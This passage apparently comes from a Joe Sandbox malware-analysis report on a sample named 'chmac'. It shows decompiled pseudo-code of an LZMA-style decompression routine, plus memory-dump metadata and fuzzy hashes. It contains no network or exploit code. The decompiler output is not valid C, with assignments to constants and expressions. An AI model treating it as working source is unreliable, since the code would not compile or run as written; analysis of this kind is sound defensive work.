												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
